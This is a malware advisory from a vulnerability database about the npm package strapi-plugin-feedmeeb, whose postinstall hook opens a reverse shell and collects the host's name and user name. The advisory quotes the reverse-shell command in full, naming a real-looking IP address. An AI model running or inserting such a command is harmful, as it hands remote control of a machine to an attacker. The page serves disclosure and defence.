VDB
Sign up

MAL-2026-16230

Malicious code in strapi-plugin-feedmeeb (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ecf1e41fb24d24ffe7b55319dda947ae30bfabb9266e38c17e1231cf4492ec5) strapi-plugin-feedmeeb@3.6.8 ships a package.json postinstall hook that executes postinstall.js on npm install. The script constructs a bash reverse shell of the form `bash -i >& /dev/tcp/14.225.210.85/80 0>&1` and exec's it via child_process, with retry logic, giving the operator of 14.225.210.85 interactive command execution on the installer's host. Alongside the shell, the script collects os.hostname() and os.userInfo().username to identify the compromised machine. The package presents itself as a Strapi plugin but its install-time behavior is unrelated to any plugin function.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/strapi-plugin-feedmeeb

No fixed version published yet for strapi-plugin-feedmeeb (npm). Pin to a known-safe version or switch to an alternative.

References